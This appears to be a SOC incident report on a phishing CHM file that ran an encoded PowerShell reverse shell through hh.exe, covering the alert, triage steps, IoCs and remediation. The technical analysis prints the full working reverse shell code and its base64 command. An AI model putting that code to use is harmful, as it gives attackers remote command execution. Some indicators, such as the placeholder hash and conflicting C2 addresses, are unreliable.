Microsoft Defender Alert Details
Alert ID: MD-CHM-EXEC-1218-7842 Alert Time: 2024-03-09 16:30:45 EST Severity: HIGH (85/100) Source: Microsoft Defender for Endpoint Rule: “Compiled HTML File (CHM) Executing Suspicious Code” MITRE ATT&CK: T1218.001 – System Binary Proxy Execution: Compiled HTML File
Alert Details:
Detection: CHM file executed with script that spawns PowerShell
Host: SALES-WS-023 (Sales Workstation) User: mwilson@company.com (Mike Wilson, Sales Rep) File: C:\Users\mwilson\Downloads\Help_Document.chm Time: 16:25 EST
Process Tree:
explorer.exe (PID: 2341)
hh.exe (HTML Help executable) (PID: 4789)
cmd.exe (PID: 4792)
powershell.exe (PID: 4795)
Command: powershell -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA==
CHM File Analysis:
File: Help_Document.chm
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Contains HTML with embedded JavaScript
JavaScript decodes and executes PowerShell command
Detection Logic:
hh.exe (legitimate CHM viewer) spawning cmd.exe and powershell.exe (unusual)
CHM file from Downloads folder (external source)
Encoded PowerShell command (reverse shell)
Pattern matches CHM-based execution bypass
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed CHM execution with PowerShell
2. File Analysis
Analyze CHM file
Defender Sandbox
Malicious CHM with script to download Cobalt Strike
3. User Interview
Contact mwilson
Teams, Phone
User opened CHM from email attachment
4. Immediate Action
Terminate processes
Defender
hh.exe, cmd.exe, powershell.exe killed
5. Email Investigation
Find source email
Proofpoint, Exchange
Email quarantined; attachment malicious
6. Account Remediation
Reset mwilson password
Azure AD, AD
Password reset; MFA enforced
Jira Incident Report
Ticket: SOC-2024-194 Summary: T1218.001 – Malicious CHM File Executes PowerShell Reverse Shell Status: RESOLVED Resolution: MALICIOUS – Process Terminated Priority: P2 – MEDIUM Labels: T1218, chm, compiled-html-file, defender, phishing Components: Endpoint-Security, Phishing-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Compiled HTML File (CHM) Executing Suspicious Code”.
Host: SALES-WS-023 (Sales, user mwilson).
File: C:\Users\mwilson\Downloads\Help_Document.chm.
Time: 2024-03-09 16:30 EST.
Technique: MITRE ATT&CK T1218.001 – System Binary Proxy Execution: Compiled HTML File.
2. Technical Analysis:
Attack Chain:
16:00 – User receives phishing email with “Help_Document.chm”
16:05 – User opens attachment (CHM file)
16:06 – hh.exe launches, loads CHM
16:07 – CHM contains JavaScript that executes PowerShell
16:08 – PowerShell connects to C2 (185.143.221[.]89:443)
16:25 – Defender detects
CHM Exploitation:
Method: CHM files can contain HTML with scripts that run when opened
hh.exe is a trusted Windows binary (often allowed)
Bypass: Executes malicious code through trusted process
PowerShell Command (decoded):
$client = New-Object System.Net.Sockets.TCPClient(‘192.168.34.56’,443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
Impact:
C2 connection established
Attacker had access for ~17 minutes
3. Investigation Findings:
Timeline:
16:00 – Email received
16:05 – CHM opened
16:08 – C2 connection
16:25 – Alert
16:27 – SOC investigates
16:28 – Processes terminated
Indicators of Compromise (IoCs):
Files:
– Help_Document.chm (SHA256: a1b2c3d4…)
Network:
– C2: 192.168.34.56:443 (internal pivot)
– External: 185.143.221[.]89 (from other host logs)
Processes:
– hh.exe -> cmd.exe -> powershell.exe
4. Containment Actions:
Immediate Actions:
Terminated hh.exe, cmd.exe, powershell.exe.
Deleted CHM file.
Isolated host.
Reset user password.
Enforced MFA.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User opened malicious CHM attachment.
Contributing Factors:
CHM files allowed as email attachments.
No ASR rule blocking hh.exe child processes.
6. Business Impact:
Operational Impact: Sales workstation offline for 2 hours.
Data Exposure: System information only.
7. Remediation & Prevention:
Completed Actions:
Malware removed.
User educated.
Technical Controls Enhanced:
Blocked CHM attachments via email gateway.
Enabled ASR rule “Block executable content from email client and webmail”.
Enhanced monitoring for hh.exe spawning child processes.
8. Conclusion:
An attacker used a CHM file to execute a PowerShell reverse shell via hh.exe, a trusted Windows binary. Defender detected the anomalous process chain and enabled rapid termination.
Closure Rationale: Malware terminated; host cleaned; user educated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-09 17:30 EST